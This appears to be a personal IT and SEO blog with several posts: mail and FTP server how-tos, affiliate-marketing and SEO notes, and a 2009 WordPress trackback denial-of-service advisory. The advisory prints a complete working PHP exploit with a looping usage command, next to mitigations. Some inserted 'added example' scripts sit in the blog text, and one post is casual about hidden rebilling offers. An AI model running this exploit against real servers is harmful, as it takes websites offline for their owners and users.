Help Fill Food Shelves
Kare 11 and Land O’Lakes are donating $1 for every person who clicks on their web site. Go to the website listed below; in the upper right corner you will see a small banner: You Click, We Donate. Just click on that banner. It’s that easy.
http://www.landolakesinc.com/company/corporateresponsibility/foundation/default.aspx
All it takes is a few seconds, and the money generated can go a long way to help people in need.
It Wasn’t Me
I noticed a spike in traffic yesterday and wondered what the heck was going on. I looked more into it and found out someone with the same name as me had charges filed against them for Conspiracy to Commit Securities Fraud.
More information can be found here: http://www.scribd.com/doc/22167590/Information-on-Steven-Fortuna
I’d just like to say that if you made it here searching for that guy, I’m not him.
I’m a 24 (25 in a couple days) year old IT geek from Minnesota, not a manager for a hedge fund committing suspected insider trading.
New 0-Day Wordpress Exploit
Wordpress is vulnerable to a very dirty exploit right now, as of 2.8.4. A resource exhaustion DoS is floating around in public. It’s a vulnerability in wp-trackback.php that hurts: the exploit POSTs a trackback whose charset parameter is a 140 KB comma-separated list of encodings, alongside an equally large title, and the server burns CPU working through it.
Here are the results from a quick test against my server:
13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24
Very dirty.
Here’s a temporary fix that can be implemented until we get a real patch.
Add the following lines to your Apache 2 config file:
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>
Put it in the main config rather than a virtual host config so it covers every site on the server (inside a <VirtualHost> it only protects that one). <Files> matches on the file name, so any request that resolves to wp-trackback.php, under any path, gets a 403 and never reaches PHP. That also disables legitimate incoming trackbacks. It’s a quick and ugly fix, but it will help against this attack.
I expect Wordpress will have an update soon.
UPDATE: With the help of a friend we have created a quick fix:
At line 47 of wp-trackback.php, after $charset has been read from the POST data, add:
if(strlen($charset) > 50)
    die;
A real charset name is far shorter than 50 characters, so this rejects the padded list without touching normal trackbacks.
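A quick way to see whether the flood is hitting you, and whether the Apache block above is actually answering it, as an added example that is not part of the original post or of the exploit: it scans an Apache combined-format access log for clients POSTing to wp-trackback.php and reports, per client, how many of those requests got anything other than a 403. The log lines embedded in it are constructed for the example, not real traffic.

```shell
#!/bin/sh
# Added example (not from the post). Assumes the Apache "combined" log format: split on
# whitespace, $1 is the client, $6 the quoted method, $7 the path and $9 the status.

# Constructed sample log: one client hammering wp-trackback.php, first served (200),
# then refused (403) once the <Files> block was in place; one ordinary visitor.
SAMPLE_LOG='10.0.0.5 - - [18/Oct/2009:13:30:01 -0500] "POST /wp-trackback.php HTTP/1.1" 200 95 "-" "-"
10.0.0.5 - - [18/Oct/2009:13:30:01 -0500] "POST /wp-trackback.php HTTP/1.1" 200 95 "-" "-"
10.0.0.5 - - [18/Oct/2009:13:30:02 -0500] "POST /wp-trackback.php HTTP/1.1" 200 95 "-" "-"
10.0.0.5 - - [18/Oct/2009:13:30:02 -0500] "POST /wp-trackback.php HTTP/1.1" 200 95 "-" "-"
10.0.0.5 - - [18/Oct/2009:13:30:29 -0500] "POST /wp-trackback.php HTTP/1.1" 403 214 "-" "-"
10.0.0.5 - - [18/Oct/2009:13:30:29 -0500] "POST /wp-trackback.php HTTP/1.1" 403 214 "-" "-"
192.0.2.7 - - [18/Oct/2009:13:30:10 -0500] "GET /2009/10/hello-world/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.7 - - [18/Oct/2009:13:30:11 -0500] "POST /wp-trackback.php HTTP/1.1" 200 95 "http://example.org/" "-"'

# trackback_posters MIN < access.log
# For every client that POSTed to wp-trackback.php at least MIN times, prints
# "<client> <posts> <not-blocked>", where not-blocked counts responses other than 403,
# i.e. requests that still reached PHP. Matches the path anywhere, so a blog installed
# under /wordpress/ or a trackback URL with a query string is counted too.
trackback_posters() {
    awk -v min="${1:-10}" '
        $6 == "\"POST" && $7 ~ /wp-trackback\.php/ {
            posts[$1]++
            if ($9 != 403) served[$1]++
        }
        END {
            for (ip in posts)
                if (posts[ip] >= min)
                    printf "%s %d %d\n", ip, posts[ip], served[ip] + 0
        }' | sort
}

# On the constructed log only 10.0.0.5 crosses a threshold of 5, and 4 of its 6
# posts got through before the block was in place.
printf '%s\n' "$SAMPLE_LOG" | trackback_posters 5
```

Against a live server run it as `trackback_posters 20 < /var/log/apache2/access.log`; once the block is working the third column should drop to 0 for new entries, and a non-zero count after the change means the request is arriving under a path the <Files> rule does not cover.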
Here’s the actual exploit.
<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * security@wordpress.org contacted and get a response,
 * but no solution available.
 *
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <panic@zerial.org>
 *
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 *
 */
if(count($argv) < 2)
    die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");
// Build /<blog path>/wp-trackback.php from the target URL.
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path[0] != '/')   // same as $path{0} in the original; the brace offset syntax is gone in PHP 8
    $path = '/'.$path;
// A 140 KB title plus a 140 KB comma-separated charset list: the list is what makes
// the trackback handler's charset conversion so expensive.
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
// Six forked children each send one oversized POST in parallel (needs the pcntl extension).
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
    if(!$fp)
        die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>
Postfix Maildrop Spam Folder
Filtering spam in Postfix is pretty simple. There are some advanced techniques you can use, but simply setting up Spamassassin will suit many people. One downside is seeing all the ***** SPAM ***** mails in your inbox. It took a while to come up with a solution, but the best fit so far has been using Maildrop as the delivery agent to automatically move those messages to a Junk folder. Here are the steps to set this up on a Debian 5.0 system with Postfix and Spamassassin.
First, setup your /etc/maildroprc file:
# commands and variables for making the mail directories
maildirmake=/usr/bin/maildirmake
mkdir=/bin/mkdir
rmdir=/bin/rmdir
MAILDIR=$DEFAULT
# make the user's mail directory if it doesn't exist
`test -e $MAILDIR`
if ($RETURNCODE != 0)
{
`$mkdir -p $MAILDIR`
`$rmdir $MAILDIR`
`$maildirmake $MAILDIR`
}
# make the .Junk folder if it doesn't exist
JUNK_FOLDER=.Junk
_JUNK_DEST=$MAILDIR/$JUNK_FOLDER/
`test -d $_JUNK_DEST`
if ($RETURNCODE != 0 )
{
`$maildirmake $_JUNK_DEST`
#auto subscribe. the following works for courier-imap
`echo INBOX.Junk >> $MAILDIR/courierimapsubscribed`
}
# If the Spam-Flag is set, move the mail to the Junk folder
if (/^X-Spam-Flag:.*YES/)
{
exception {
to $DEFAULT/.Junk/
}
}
The comments clearly state what’s going on there.
Once that’s set up, open /etc/postfix/master.cf and make sure the maildrop transport is not commented out:
maildrop unix - n n - - pipe
flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
Next, make /usr/bin/maildrop setuid root. The master.cf entry runs it as vmail with -d ${recipient}, and maildrop only honours -d when run by root (or a compiled-in trusted user), because it needs that privilege to look the recipient up through authdaemon and deliver into that user’s mail folders.
#chmod +s /usr/bin/maildrop
Since this turns maildrop into a setuid-root program for every local account, keep its execute permission limited to the vmail user that Postfix runs it as rather than leaving it world-executable.
The last thing you have to do is add this to your /etc/postfix/main.cf file:
virtual_transport = maildrop
maildrop_destination_recipient_limit = 1
If there is another virtual_transport line, be sure to comment that out first.
And that’s all. Nice and simple way to handle all that Junk mail.
Debian Pure-FTPD Virtual Users Howto
After being a dedicated Gentoo user, I’ve recently moved over to Debian, hoping to work more on productive tasks than just administering my servers. In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different than Gentoo.
I thought I’d write up a quick how-to on configuring Pure-FTPD with virtual users in Debian, as sort of a personal reference, and in the hope someone else will be able to put it to use. And here we go.
Enable PureDB authentication:
# cd /etc/pure-ftpd/auth
# ln -s ../conf/PureDB 50pure
To disable PAM authentication and UNIX authentication so you only have virtual users:
# echo no > /etc/pure-ftpd/conf/PAMAuthentication
# echo no > /etc/pure-ftpd/conf/UnixAuthentication
That’s it. Restart pure-ftpd afterwards so the Debian wrapper rebuilds the daemon’s command line from the auth and conf directories. Simple, but when coming from a single config file this isn’t at all intuitive – at least to me.
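The piece the post leaves out is actually creating a virtual user once PureDB authentication is on, so here is an added example (mine, not from the post or the Pure-FTPD project). It assumes Debian’s default pure-pw files (/etc/pure-ftpd/pureftpd.passwd compiled into /etc/pure-ftpd/pureftpd.pdb, the file conf/PureDB names), one shared system account ftpuser:ftpgroup that owns every virtual user’s data, and /srv/ftp as the root; those names and the path are choices for this example. The login-name check is there because the name ends up both in a chroot path and on a pure-pw command line.

```shell
#!/bin/sh
# Added example (not from the post): chrooted Pure-FTPD virtual users on Debian.
# ftpuser/ftpgroup and /srv/ftp are assumptions for this example.
FTP_SYSUSER=${FTP_SYSUSER:-ftpuser}
FTP_SYSGROUP=${FTP_SYSGROUP:-ftpgroup}
FTP_ROOT=${FTP_ROOT:-/srv/ftp}

# A login is accepted only if it is a short lowercase name: dots, slashes, spaces,
# shell metacharacters and a leading dash are refused, since the name becomes part of
# the chroot directory and an argument to pure-pw.
valid_login() {
    case "$1" in
        ''|-*|*[!a-z0-9_-]*) return 1 ;;
        *) [ "${#1}" -le 32 ] ;;
    esac
}

# Prints the directory the virtual user will be chrooted into, or fails on a bad login.
home_for() {
    valid_login "$1" || return 1
    printf '%s/%s\n' "$FTP_ROOT" "$1"
}

# Creates the home directory and the PureDB entry. Run as root; pure-pw prompts for the
# password twice. -u/-g map the login onto the one system account, -d (unlike -D)
# chroots the session into its home, and -m rewrites pureftpd.pdb immediately so no
# separate "pure-pw mkdb" is needed.
add_virtual_user() {
    home=$(home_for "$1") || { echo "refusing login name: $1" >&2; return 1; }
    mkdir -p "$home"
    chown "$FTP_SYSUSER:$FTP_SYSGROUP" "$home"
    chmod 750 "$home"
    pure-pw useradd "$1" -u "$FTP_SYSUSER" -g "$FTP_SYSGROUP" -d "$home" -m
}

# Usage: sh pureftpd-vuser.sh setup        (once: shared account with no login shell)
#        sh pureftpd-vuser.sh add alice    (per virtual user)
case "${1:-}" in
    setup)
        groupadd "$FTP_SYSGROUP"
        useradd -g "$FTP_SYSGROUP" -d "$FTP_ROOT" -s /bin/false "$FTP_SYSUSER"
        mkdir -p "$FTP_ROOT"
        ;;
    add) add_virtual_user "$2" ;;
esac
```

Because every virtual user maps onto the same unprivileged system account and is chrooted into its own directory, a compromised FTP password exposes that one tree and nothing else on the box; the login check keeps a crafted name from turning the home path into something outside FTP_ROOT.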
I’ve always recommended Pure-FTPD for its security, features, and simplicity. You can find out more information at the official Pure-FTPD project’s website: www.Pure-FTPD.org
First Profitable Campaign
Posted by steve in Affiliate Marketing on July 9, 2009
Haven’t posted in a while – as there wasn’t really anything to talk about. I’ve established a handful of arcade sites in the last few weeks. My goal there is to build up a solid network so I can trade traffic between the sites, and give myself some sites to link from when exchanging links for hubits. Some of the sites are: gemarcade.com, arcadeswamp.com, digarcade.com, castledefence.org, parkinggame.net, and instarcade.com. There’s a few others, but not worth mentioning.
But I have managed to run into an affiliate network that has been very helpful in getting me setup with a campaign. I’m currently running some Facebook ads for a simple free signup. Low payout, but also low cost to advertise. It’s pretty exciting, and I’m hoping to simply generate some revenue I can invest into some bigger offers. I’d love to share all the details, but I’m not at the point where I can afford to, or know enough about it to be more useful than the many other sites talking about it. One being nickycakes.com.
The campaign really wasn’t anything to brag about. Simply making $10 on a $80 investment. But for me it’s a relief to finally break even, let alone make money. Well, let’s hope the earnings go up from here.
Taking a step back
Well I got this site up and going, got on to the first page of when searching Google for Steve Fortuna…and I have no readers.
Blogging to myself is a blast! Haha, no. Blogging is kind of entertaining, but not really my thing. I’m going to take a step back, and focus less on posting regularly. What’s the point, right? When the traffic picks up, or I come up with some really good post ideas, I won’t hesitate to post.
And I’m out.
Affiliate Marketing
Posted by steve in Affiliate Marketing on May 27, 2009
I’ve heard a lot about affiliate marketing in the past, but was never really interested. It seemed to me that you just sold products for someone else for a tiny piece of the profit. Seemed pointless, and a lot of effort for not much return.
That was until I read through a blog called Nickycakes. The title of the blog is Reformed Blackhat, which seemed interesting. I ended up at the newbie affiliate marketing section – and boy did it pique my interest. This guy has an attitude I like, gets straight to the point, and opened up a whole new way of making money online for me.
After reading through the entire guide, I decided I would give affiliate marketing a shot. Essentially what you do is create a page, or landing page, and send traffic to it. The goal of the landing page is to convince the user to sign up/buy/do whatever for your product. These can be anywhere from simple ad looking pages, to review sites, or even flogs (fake blogs). The whole idea of it seems real interesting so I started right up.
Turns out it is a lot more shady than I had expected. A lot of money is made on rebills (billing someone after the initial $2 or whatever), generally without their knowledge. Terms of Service stating the rebill is hidden at the bottom of the page or anywhere out of sight. Most of the products are sub par, and a Google search reveals them to be mostly a scam.
Now I personally wouldn’t be opposed to promoting some of the products, as it’s not like you’re stealing. Technically the terms are explained to them. It’s like the offer is an IQ test in itself (one of the products offered). If they don’t sign up, average to above average IQ, but if they do – they fail the IQ test. Haha. But this is only one method of affiliate marketing.
One other type of affiliate marketing I’ve begun to explore is local affiliate marketing. You don’t sell a product hundreds, if not thousands, of others are selling online. You sell local products/services that local businesses provide. This, in my opinion, is a lot more ethical – and even has a chance to earn a lot more money.
Simply contact businesses and set up relationships to sell products for them. I am three days into my first campaign of local affiliate marketing, and experimenting with PPC advertising and some SEO advertising. Nothing interesting to report, as the 20 people total who went to my landing page so far aren’t a good display of the results I should expect. It’s fun and interesting though. The potential is there, it’s just making it work.
For more information on local affiliate marketing, check out: http://www.shoemoney.com/2008/11/04/making-money-with-local-affiliate-programs
Ranking In Google
Posted by steve in Search Engine Optimization on May 14, 2009
Well that didn’t take long. It was four days since I launched this site, and Google pushed me up to #1 for the keyword: Steve Fortuna. It really wasn’t very hard at all. I purchased this domain September of 2008, and had a simple ‘coming soon…’ page up. I just had to convince Google to crawl the page again, and that the content was relevant.
Being that I had the domain that fully matched the search term I was targeting, it was pretty easy. That’s always a major consideration when deciding what domain to purchase. Trying to throw at least one keyword you’re trying to target in the domain is always helpful. It’s not required, of course, but helps quite a bit. stevefortuna.com ranked #1 for the keyword ‘Steve fortuna’ very easily. A couple links in with the anchor text ’steve fortuna’ was all that was needed.
Deciding whether you want to go with a keyword domain or a brandable domain is simply a matter of your goals. If you’re looking for quick ranking for low competition keywords, a keyword domain would be key. But if you’re going to take the time to build a brand, go with a domain you like – something brandable. Two examples of these are of course, stevefortuna.com, with intended target: steve fortuna, and then hubits.com, with intended target: free arcade games.
Sulumits Retsambew
Posted by steve in Search Engine Optimization on May 11, 2009
Sulumits Retsambew is the target keyword for a new search engine optimization contest hosted by NetBuilders.org. For those that aren’t familiar with SEO contests, it’s essentially a competition to outrank others in Google, or any other search engine depending on the specific contest.
The term sulumits retsambew written backwards is webmaster stimulus. This is NetBuilders’ way of running a “stimulus package” for webmasters. The contest started March 15th, and runs through August 15th, which is quite a while for an SEO contest. But it’s also a good way to judge the effects of SEO over time. Will blackhat methods win, or will pure whitehat SEO come out on top? Only time will tell.
The prizes for the contest are as follows: $1000 for first, $500 for second, and $250 for third. $1000 is a nice payout and would be nice to grab for anyone.
Currently my entry in the sulumits retsambew contest is WebmasterStimulus.org. All the exact keyword domains were taken by the time I got started. I’m hoping all the mention of the term webmaster stimulus on all the sulumits retsambew sites will convince google that they are related, and in turn give the WebmasterStimulus.org domain a lot of weight based on the keywords in the domain. This may already be the case as I’m currently in second position.
I am relatively new in the SEO world. I mildly got interested in it about six months ago, but really didn’t make any progress or really understand what I was doing until a few months ago. It will be interesting to see how my skills will stand up against the experts.
I found what I consider a real nice template for the site WebmasterStimulus.org, and decided to use it on this blog as well. I’m sure you have by now noticed the similarities.